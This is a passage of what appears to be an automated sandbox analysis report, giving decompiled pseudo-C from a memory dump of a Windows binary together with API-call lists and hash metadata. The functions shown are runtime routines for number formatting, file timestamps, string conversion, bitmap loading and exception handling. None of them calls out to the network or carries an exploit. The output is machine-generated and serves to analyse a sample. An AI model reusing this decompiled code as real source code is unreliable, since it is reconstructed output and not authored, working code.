                                                                            							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
                                                                            						} else {
                                                                            							 *_t146 = 0;
                                                                            						}
                                                                            						_t92 = _t172[1] & 0x000fffff;
                                                                            						__eflags = _t92;
                                                                            						_v20 = _t92;
                                                                            						if(_t92 > 0) {
                                                                            							L23:
                                                                            							_t33 =  &_v8;
                                                                            							 *_t33 = _v8 & 0x00000000;
                                                                            							__eflags =  *_t33;
                                                                            							_t147 = 0xf0000;
                                                                            							_t93 = 0x30;
                                                                            							_v12 = _t93;
                                                                            							_v20 = 0xf0000;
                                                                            							do {
                                                                            								__eflags = _t181;
                                                                            								if(_t181 <= 0) {
                                                                            									break;
                                                                            								}
                                                                            								_t119 = E001ADAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                                            								_t161 = 0x30;
                                                                            								_t121 = _t119 + _t161 & 0x0000ffff;
                                                                            								__eflags = _t121 - 0x39;
                                                                            								if(_t121 > 0x39) {
                                                                            									_t121 = _t121 + _t136;
                                                                            									__eflags = _t121;
                                                                            								}
                                                                            								_t162 = _v20;
                                                                            								_t172 = _a4;
                                                                            								 *_t186 = _t121;
                                                                            								_t186 = _t186 + 1;
                                                                            								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                                                                            								_t147 = _t162 >> 4;
                                                                            								_t93 = _v12 - 4;
                                                                            								_t181 = _t181 - 1;
                                                                            								_v20 = _t162 >> 4;
                                                                            								_v12 = _t93;
                                                                            								__eflags = _t93;
                                                                            							} while (_t93 >= 0);
                                                                            							__eflags = _t93;
                                                                            							if(_t93 < 0) {
                                                                            								goto L39;
                                                                            							}
                                                                            							_t115 = E001ADAC0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                                            							__eflags = _t115 - 8;
                                                                            							if(_t115 <= 8) {
                                                                            								goto L39;
                                                                            							}
                                                                            							_t54 = _t186 - 1; // 0x1b3fc1
                                                                            							_t116 = _t54;
                                                                            							_t138 = 0x30;
                                                                            							while(1) {
                                                                            								_t156 =  *_t116;
                                                                            								__eflags = _t156 - 0x66;
                                                                            								if(_t156 == 0x66) {
                                                                            									goto L33;
                                                                            								}
                                                                            								__eflags = _t156 - 0x46;
                                                                            								if(_t156 != 0x46) {
                                                                            									_t139 = _v32;
                                                                            									__eflags = _t116 - _v28;
                                                                            									if(_t116 == _v28) {
                                                                            										_t57 = _t116 - 1;
                                                                            										 *_t57 =  *(_t116 - 1) + 1;
                                                                            										__eflags =  *_t57;
                                                                            									} else {
                                                                            										_t157 =  *_t116;
                                                                            										__eflags = _t157 - 0x39;
                                                                            										if(_t157 != 0x39) {
                                                                            											 *_t116 = _t157 + 1;
                                                                            										} else {
                                                                            											 *_t116 = _t139 + 0x3a;
                                                                            										}
                                                                            									}
                                                                            									goto L39;
                                                                            								}
                                                                            								L33:
                                                                            								 *_t116 = _t138;
                                                                            								_t116 = _t116 - 1;
                                                                            							}
                                                                            						} else {
                                                                            							__eflags =  *_t172;
                                                                            							if( *_t172 <= 0) {
                                                                            								L39:
                                                                            								__eflags = _t181;
                                                                            								if(_t181 > 0) {
                                                                            									_push(_t181);
                                                                            									_t111 = 0x30;
                                                                            									_push(_t111);
                                                                            									_push(_t186);
                                                                            									E001AE920(_t181);
                                                                            									_t186 = _t186 + _t181;
                                                                            									__eflags = _t186;
                                                                            								}
                                                                            								_t94 = _v28;
                                                                            								__eflags =  *_t94;
                                                                            								if( *_t94 == 0) {
                                                                            									_t186 = _t94;
                                                                            								}
                                                                            								__eflags = _a28;
                                                                            								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                                            								_t174 = _a4[1];
                                                                            								_t100 = E001ADAC0( *_a4, 0x34, _t174);
                                                                            								_t137 = 0;
                                                                            								_t151 = (_t100 & 0x000007ff) - _v16;
                                                                            								__eflags = _t151;
                                                                            								asm("sbb ebx, ebx");
                                                                            								if(__eflags < 0) {
                                                                            									L47:
                                                                            									 *(_t186 + 1) = 0x2d;
                                                                            									_t187 = _t186 + 2;
                                                                            									__eflags = _t187;
                                                                            									_t151 =  ~_t151;
                                                                            									asm("adc ebx, 0x0");
                                                                            									_t137 =  ~_t137;
                                                                            									goto L48;
                                                                            								} else {
                                                                            									if(__eflags > 0) {
                                                                            										L46:
                                                                            										 *(_t186 + 1) = 0x2b;
                                                                            										_t187 = _t186 + 2;
                                                                            										L48:
                                                                            										_t182 = _t187;
                                                                            										_t101 = 0x30;
                                                                            										 *_t187 = _t101;
                                                                            										__eflags = _t137;
                                                                            										if(__eflags < 0) {
                                                                            											L56:
                                                                            											__eflags = _t187 - _t182;
                                                                            											if(_t187 != _t182) {
                                                                            												L60:
                                                                            												_push(0);
                                                                            												_push(0xa);
                                                                            												_push(_t137);
                                                                            												_push(_t151);
                                                                            												_t102 = E001ADE00();
                                                                            												_v32 = _t174;
                                                                            												 *_t187 = _t102 + 0x30;
                                                                            												_t187 = _t187 + 1;
                                                                            												__eflags = _t187;
                                                                            												L61:
                                                                            												_t104 = 0x30;
                                                                            												_t183 = 0;
                                                                            												__eflags = 0;
                                                                            												 *_t187 = _t151 + _t104;
                                                                            												 *(_t187 + 1) = 0;
                                                                            												goto L62;
                                                                            											}
                                                                            											__eflags = _t137;
                                                                            											if(__eflags < 0) {
                                                                            												goto L61;
                                                                            											}
                                                                            											if(__eflags > 0) {
                                                                            												goto L60;
                                                                            											}
                                                                            											__eflags = _t151 - 0xa;
                                                                            											if(_t151 < 0xa) {
                                                                            												goto L61;
                                                                            											}
                                                                            											goto L60;
                                                                            										}
                                                                            										if(__eflags > 0) {
                                                                            											L51:
                                                                            											_push(0);
                                                                            											_push(0x3e8);
                                                                            											_push(_t137);
                                                                            											_push(_t151);
                                                                            											_t107 = E001ADE00();
                                                                            											_v32 = _t174;
                                                                            											 *_t187 = _t107 + 0x30;
                                                                            											_t187 = _t187 + 1;
                                                                            											__eflags = _t187 - _t182;
                                                                            											if(_t187 != _t182) {
                                                                            												L55:
                                                                            												_push(0);
                                                                            												_push(0x64);
                                                                            												_push(_t137);
                                                                            												_push(_t151);
                                                                            												_t109 = E001ADE00();
                                                                            												_v32 = _t174;
                                                                            												 *_t187 = _t109 + 0x30;
                                                                            												_t187 = _t187 + 1;
                                                                            												__eflags = _t187;
                                                                            												goto L56;
                                                                            											}
                                                                            											L52:
                                                                            											__eflags = _t137;
                                                                            											if(__eflags < 0) {
                                                                            												goto L56;
                                                                            											}
                                                                            											if(__eflags > 0) {
                                                                            												goto L55;
                                                                            											}
                                                                            											__eflags = _t151 - 0x64;
                                                                            											if(_t151 < 0x64) {
                                                                            												goto L56;
                                                                            											}
                                                                            											goto L55;
                                                                            										}
                                                                            										__eflags = _t151 - 0x3e8;
                                                                            										if(_t151 < 0x3e8) {
                                                                            											goto L52;
                                                                            										}
                                                                            										goto L51;
                                                                            									}
                                                                            									__eflags = _t151;
                                                                            									if(_t151 < 0) {
                                                                            										goto L47;
                                                                            									}
                                                                            									goto L46;
                                                                            								}
                                                                            							}
                                                                            							goto L23;
                                                                            						}
                                                                            					}
                                                                            					__eflags = 0;
                                                                            					if(0 != 0) {
                                                                            						goto L11;
                                                                            					} else {
                                                                            						_t183 = E001B8A4C(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                                                                            						__eflags = _t183;
                                                                            						if(_t183 == 0) {
                                                                            							_t128 = E001C0FD0(_t184, 0x65);
                                                                            							_pop(_t166);
                                                                            							__eflags = _t128;
                                                                            							if(_t128 != 0) {
                                                                            								__eflags = _a28;
                                                                            								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                                            								__eflags = _t170;
                                                                            								 *_t128 = _t170;
                                                                            								 *((char*)(_t128 + 3)) = 0;
                                                                            							}
                                                                            							_t183 = 0;
                                                                            						} else {
                                                                            							 *_t184 = 0;
                                                                            						}
                                                                            						goto L62;
                                                                            					}
                                                                            				} else {
                                                                            					_t129 = E001B7ECC();
                                                                            					_t183 = 0x22;
                                                                            					 *_t129 = _t183;
                                                                            					E001B7DAB();
                                                                            					L62:
                                                                            					if(_v40 != 0) {
                                                                            						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                                                                            					}
                                                                            					return _t183;
                                                                            				}
                                                                            			}

                                                                            0x001b89ce
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001b89ce
                                                                            0x001b899f
                                                                            0x001b89a1
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001b89a1
                                                                            0x001b899b
                                                                            0x00000000
                                                                            0x001b8885
                                                                            0x001b8880
                                                                            0x001b87a7
                                                                            0x001b87a9
                                                                            0x00000000
                                                                            0x001b87ab
                                                                            0x001b87c1
                                                                            0x001b87c6
                                                                            0x001b87c8
                                                                            0x001b87d4
                                                                            0x001b87da
                                                                            0x001b87db
                                                                            0x001b87dd
                                                                            0x001b87df
                                                                            0x001b87ea
                                                                            0x001b87ea
                                                                            0x001b87ed
                                                                            0x001b87ef
                                                                            0x001b87ef
                                                                            0x001b87f2
                                                                            0x001b87ca
                                                                            0x001b87ca
                                                                            0x001b87ca
                                                                            0x00000000
                                                                            0x001b87c8
                                                                            0x001b8777
                                                                            0x001b8777
                                                                            0x001b877e
                                                                            0x001b877f
                                                                            0x001b8781
                                                                            0x001b8a33
                                                                            0x001b8a37
                                                                            0x001b8a3c
                                                                            0x001b8a3c
                                                                            0x001b8a4b
                                                                            0x001b8a4b

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: __alldvrm$_strrchr
                                                                            • String ID:
                                                                            • API String ID: 1036877536-0
                                                                            • Opcode ID: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                                                                            • Instruction ID: 7345a71d7d7c5654371964df2c910d91d63ca1eba784b2c8dec9453824bcaa8c
                                                                            • Opcode Fuzzy Hash: f2926f290b12bce643c0ba6d96074ca090c44e05cafcf7f54dcf12bfeb7df9bf
                                                                            • Instruction Fuzzy Hash: 07A1AB319043869FEB25CF28C8817FEBBE8EF65714F28016EE4959B281CB348D41C751
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
                                                                            			E00199F96(void* __edx) {
                                                                            				signed char _t40;
                                                                            				void* _t41;
                                                                            				void* _t52;
                                                                            				signed char _t70;
                                                                            				void* _t79;
                                                                            				signed int* _t81;
                                                                            				signed int* _t84;
                                                                            				void* _t85;
                                                                            				signed int* _t88;
                                                                            				void* _t90;
                                                                            
                                                                            				_t79 = __edx;
                                                                            				E001AD940();
                                                                            				_t84 =  *(_t90 + 0x1038);
                                                                            				_t70 = 1;
                                                                            				if(_t84 == 0) {
                                                                            					L2:
                                                                            					 *(_t90 + 0x11) = 0;
                                                                            					L3:
                                                                            					_t81 =  *(_t90 + 0x1040);
                                                                            					if(_t81 == 0) {
                                                                            						L5:
                                                                            						 *(_t90 + 0x13) = 0;
                                                                            						L6:
                                                                            						_t88 =  *(_t90 + 0x1044);
                                                                            						if(_t88 == 0) {
                                                                            							L8:
                                                                            							 *(_t90 + 0x12) = 0;
                                                                            							L9:
                                                                            							_t40 = E00199E7F( *(_t90 + 0x1038));
                                                                            							 *(_t90 + 0x18) = _t40;
                                                                            							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
                                                                            								_t70 = 0;
                                                                            							} else {
                                                                            								E0019A12F( *((intOrPtr*)(_t90 + 0x103c)), 0);
                                                                            							}
                                                                            							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
                                                                            							 *(_t90 + 0x14) = _t41;
                                                                            							if(_t41 != 0xffffffff) {
                                                                            								L16:
                                                                            								if( *(_t90 + 0x11) != 0) {
                                                                            									E001A082F(_t84, _t79, _t90 + 0x1c);
                                                                            								}
                                                                            								if( *(_t90 + 0x13) != 0) {
                                                                            									E001A082F(_t81, _t79, _t90 + 0x2c);
                                                                            								}
                                                                            								if( *(_t90 + 0x12) != 0) {
                                                                            									E001A082F(_t88, _t79, _t90 + 0x24);
                                                                            								}
                                                                            								_t85 =  *(_t90 + 0x14);
                                                                            								asm("sbb eax, eax");
                                                                            								asm("sbb eax, eax");
                                                                            								asm("sbb eax, eax");
                                                                            								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
                                                                            								_t52 = CloseHandle(_t85);
                                                                            								if(_t70 != 0) {
                                                                            									_t52 = E0019A12F( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
                                                                            								}
                                                                            								goto L24;
                                                                            							} else {
                                                                            								_t52 = E0019B32C( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
                                                                            								if(_t52 == 0) {
                                                                            									L24:
                                                                            									return _t52;
                                                                            								}
                                                                            								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
                                                                            								 *(_t90 + 0x14) = _t52;
                                                                            								if(_t52 == 0xffffffff) {
                                                                            									goto L24;
                                                                            								}
                                                                            								goto L16;
                                                                            							}
                                                                            						}
                                                                            						 *(_t90 + 0x12) = _t70;
                                                                            						if(( *_t88 | _t88[1]) != 0) {
                                                                            							goto L9;
                                                                            						}
                                                                            						goto L8;
                                                                            					}
                                                                            					 *(_t90 + 0x13) = _t70;
                                                                            					if(( *_t81 | _t81[1]) != 0) {
                                                                            						goto L6;
                                                                            					}
                                                                            					goto L5;
                                                                            				}
                                                                            				 *(_t90 + 0x11) = 1;
                                                                            				if(( *_t84 | _t84[1]) != 0) {
                                                                            					goto L3;
                                                                            				}
                                                                            				goto L2;
                                                                            			}

                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00197F2C,?,?,?), ref: 0019A03C
                                                                            • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00197F2C,?,?), ref: 0019A080
                                                                            • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00197F2C,?,?,?,?,?,?,?,?), ref: 0019A101
                                                                            • CloseHandle.KERNEL32(?,?,00000000,?,00197F2C,?,?,?,?,?,?,?,?,?,?,?), ref: 0019A108
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: File$Create$CloseHandleTime
                                                                            • String ID:
                                                                            • API String ID: 2287278272-0
                                                                            • Opcode ID: 29ce10831df6679c1501ad305a15ff02ce10fe8eac4791261795f017d3c66dd3
                                                                            • Instruction ID: 17e7558ac1f2b3d2cac30a8e1c07a904119f1c9123c36fb239da1fedec700df0
                                                                            • Opcode Fuzzy Hash: 29ce10831df6679c1501ad305a15ff02ce10fe8eac4791261795f017d3c66dd3
                                                                            • Instruction Fuzzy Hash: 3741CD706483819AEB21DE28DC45FAEBBE8AF95300F08091DB5E1D3181D774DA4CDB93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 85%
                                                                            			E001BB5EA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                            				signed int _v8;
                                                                            				int _v12;
                                                                            				char _v16;
                                                                            				intOrPtr _v24;
                                                                            				char _v28;
                                                                            				void* _v40;
                                                                            				signed int _t34;
                                                                            				signed int _t40;
                                                                            				int _t46;
                                                                            				int _t53;
                                                                            				void* _t55;
                                                                            				int _t57;
                                                                            				signed int _t63;
                                                                            				int _t67;
                                                                            				short* _t69;
                                                                            				signed int _t70;
                                                                            				short* _t71;
                                                                            
                                                                            				_t34 =  *0x1cd668; // 0x44aa1787
                                                                            				_v8 = _t34 ^ _t70;
                                                                            				E001B3356(__ebx,  &_v28, __edx, _a4);
                                                                            				_t57 = _a24;
                                                                            				if(_t57 == 0) {
                                                                            					_t6 = _v24 + 8; // 0x31e85006
                                                                            					_t53 =  *_t6;
                                                                            					_t57 = _t53;
                                                                            					_a24 = _t53;
                                                                            				}
                                                                            				_t67 = 0;
                                                                            				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                            				_v12 = _t40;
                                                                            				if(_t40 == 0) {
                                                                            					L15:
                                                                            					if(_v16 != 0) {
                                                                            						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                            					}
                                                                            					return E001AE203(_t67, _v8 ^ _t70);
                                                                            				}
                                                                            				_t55 = _t40 + _t40;
                                                                            				asm("sbb eax, eax");
                                                                            				if((_t55 + 0x00000008 & _t40) == 0) {
                                                                            					_t69 = 0;
                                                                            					L11:
                                                                            					if(_t69 != 0) {
                                                                            						E001AE920(_t67, _t69, _t67, _t55);
                                                                            						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                                                            						if(_t46 != 0) {
                                                                            							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                                                            						}
                                                                            					}
                                                                            					L14:
                                                                            					E001B980D(_t69);
                                                                            					goto L15;
                                                                            				}
                                                                            				asm("sbb eax, eax");
                                                                            				_t48 = _t40 & _t55 + 0x00000008;
                                                                            				_t63 = _t55 + 8;
                                                                            				if((_t40 & _t55 + 0x00000008) > 0x400) {
                                                                            					asm("sbb eax, eax");
                                                                            					_t69 = E001B7A8A(_t63, _t48 & _t63);
                                                                            					if(_t69 == 0) {
                                                                            						goto L14;
                                                                            					}
                                                                            					 *_t69 = 0xdddd;
                                                                            					L9:
                                                                            					_t69 =  &(_t69[4]);
                                                                            					goto L11;
                                                                            				}
                                                                            				asm("sbb eax, eax");
                                                                            				E001C0EE0();
                                                                            				_t69 = _t71;
                                                                            				if(_t69 == 0) {
                                                                            					goto L14;
                                                                            				}
                                                                            				 *_t69 = 0xcccc;
                                                                            				goto L9;
                                                                            			}





















                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,31E85006,001B34E6,00000000,00000000,001B451B,?,001B451B,?,00000001,001B34E6,31E85006,00000001,001B451B,001B451B), ref: 001BB637
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001BB6C0
                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 001BB6D2
                                                                            • __freea.LIBCMT ref: 001BB6DB
                                                                              • Part of subcall function 001B7A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,001B2FA6,?,0000015D,?,?,?,?,001B4482,000000FF,00000000,?,?), ref: 001B7ABC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                            • String ID:
                                                                            • API String ID: 2652629310-0
                                                                            • Opcode ID: ce33ae772829079e99fa1c48ed1e1207f3ce319df2903055a84bc90ea74ab09e
                                                                            • Instruction ID: 7213f21a7edfe585d37df0b2bdb2783b5463a14100a8138cf85902071062a0b2
                                                                            • Opcode Fuzzy Hash: ce33ae772829079e99fa1c48ed1e1207f3ce319df2903055a84bc90ea74ab09e
                                                                            • Instruction Fuzzy Hash: 6C31ED72A0420AABDF248F65CC81EEF7BA5EB40310F194128FC14DB290EB75DD90CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001AA4F8(void* __edx, void* __fp0) {
                                                                            				intOrPtr _v20;
                                                                            				intOrPtr _v24;
                                                                            				void _v28;
                                                                            				void* _t11;
                                                                            				void* _t13;
                                                                            				signed int _t18;
                                                                            				signed int _t19;
                                                                            				void* _t21;
                                                                            				void* _t22;
                                                                            				void* _t26;
                                                                            				void* _t32;
                                                                            
                                                                            				_t32 = __fp0;
                                                                            				_t21 = __edx;
                                                                            				_t22 = LoadBitmapW( *0x1d0060, 0x65);
                                                                            				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
                                                                            				_t28 = _t19;
                                                                            				if(_t19 != 0) {
                                                                            					_t22 = E001A963A(0x65);
                                                                            				}
                                                                            				GetObjectW(_t22, 0x18,  &_v28);
                                                                            				if(E001A952A(_t28) != 0) {
                                                                            					if(_t19 != 0) {
                                                                            						_t26 = E001A963A(0x66);
                                                                            						if(_t26 != 0) {
                                                                            							DeleteObject(_t22);
                                                                            							_t22 = _t26;
                                                                            						}
                                                                            					}
                                                                            					_t11 = E001A958C(_v20);
                                                                            					_t13 = E001A975D(_t21, _t32, _t22, E001A9549(_v24), _t11);
                                                                            					DeleteObject(_t22);
                                                                            					_t22 = _t13;
                                                                            				}
                                                                            				return _t22;
                                                                            			}















                                                                            APIs
                                                                            • LoadBitmapW.USER32(00000065), ref: 001AA508
                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 001AA529
                                                                            • DeleteObject.GDI32(00000000), ref: 001AA551
                                                                            • DeleteObject.GDI32(00000000), ref: 001AA570
                                                                              • Part of subcall function 001A963A: FindResourceW.KERNEL32(00000066,PNG,?,?,001AA54A,00000066), ref: 001A964B
                                                                              • Part of subcall function 001A963A: SizeofResource.KERNEL32(00000000,77125B70,?,?,001AA54A,00000066), ref: 001A9663
                                                                              • Part of subcall function 001A963A: LoadResource.KERNEL32(00000000,?,?,001AA54A,00000066), ref: 001A9676
                                                                              • Part of subcall function 001A963A: LockResource.KERNEL32(00000000,?,?,001AA54A,00000066), ref: 001A9681
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 142272564-0
                                                                            • Opcode ID: bd2dc113d9e1f40836cb8b2567bb0b95e5e302a693ee3d92fb8179450135fe37
                                                                            • Instruction ID: db9cfb823c9bd6cc6b2a7515fba9bd2ba96512c6d9e7b6e7f4a948b4abad0f60
                                                                            • Opcode Fuzzy Hash: bd2dc113d9e1f40836cb8b2567bb0b95e5e302a693ee3d92fb8179450135fe37
                                                                            • Instruction Fuzzy Hash: E501F23AA4010527C71233789C46E7F7BAEAF97B51F480025BA00A7291DF228C4292A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 20%
                                                                            			E001B1A89(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				void* _t25;
                                                                            				void* _t27;
                                                                            				void* _t28;
                                                                            				intOrPtr _t30;
                                                                            				intOrPtr* _t32;
                                                                            				void* _t34;
                                                                            
                                                                            				_t29 = __edx;
                                                                            				_t27 = __ebx;
                                                                            				_t36 = _a28;
                                                                            				_t30 = _a8;
                                                                            				if(_a28 != 0) {
                                                                            					_push(_a28);
                                                                            					_push(_a24);
                                                                            					_push(_t30);
                                                                            					_push(_a4);
                                                                            					E001B20D8(__edx, _t36);
                                                                            					_t34 = _t34 + 0x10;
                                                                            				}
                                                                            				_t37 = _a40;
                                                                            				_push(_a4);
                                                                            				if(_a40 != 0) {
                                                                            					_push(_a40);
                                                                            				} else {
                                                                            					_push(_t30);
                                                                            				}
                                                                            				E001AF1DB(_t28);
                                                                            				_t32 = _a32;
                                                                            				_push( *_t32);
                                                                            				_push(_a20);
                                                                            				_push(_a16);
                                                                            				_push(_t30);
                                                                            				E001B22DA(_t27, _t28, _t29, _t30, _t37);
                                                                            				_push(0x100);
                                                                            				_push(_a36);
                                                                            				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
                                                                            				_push( *((intOrPtr*)(_a24 + 0xc)));
                                                                            				_push(_a20);
                                                                            				_push(_a12);
                                                                            				_push(_t30);
                                                                            				_push(_a4);
                                                                            				_t25 = E001B1893(_t29, _t32, _t37);
                                                                            				if(_t25 != 0) {
                                                                            					E001AF1A9(_t25, _t30);
                                                                            					return _t25;
                                                                            				}
                                                                            				return _t25;
                                                                            			}













                                                                            APIs
                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 001B1AA0
                                                                              • Part of subcall function 001B20D8: ___AdjustPointer.LIBCMT ref: 001B2122
                                                                            • _UnwindNestedFrames.LIBCMT ref: 001B1AB7
                                                                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 001B1AC9
                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 001B1AED
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                            • String ID:
                                                                            • API String ID: 2633735394-0
                                                                            • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                            • Instruction ID: 255a7ccb423b2ce03cc775ce4d7c87079dc08f8ec69f5c922d2958881ff0e4cf
                                                                            • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                            • Instruction Fuzzy Hash: 12014C32000148FBDF12AFA5CC01EDA3BBAFF59754F154514FD1866120D332E8A1DBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001B15E6() {
                                                                            				void* _t4;
                                                                            				void* _t8;
                                                                            
                                                                            				E001B29B7();
                                                                            				E001B294B();
                                                                            				if(E001B268E() != 0) {
                                                                            					_t4 = E001B1726(_t8, __eflags);
                                                                            					__eflags = _t4;
                                                                            					if(_t4 != 0) {
                                                                            						return 1;
                                                                            					} else {
                                                                            						E001B26CA();
                                                                            						goto L1;
                                                                            					}
                                                                            				} else {
                                                                            					L1:
                                                                            					return 0;
                                                                            				}
                                                                            			}






                                                                            APIs
                                                                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 001B15E6
                                                                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 001B15EB
                                                                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 001B15F0
                                                                              • Part of subcall function 001B268E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 001B269F
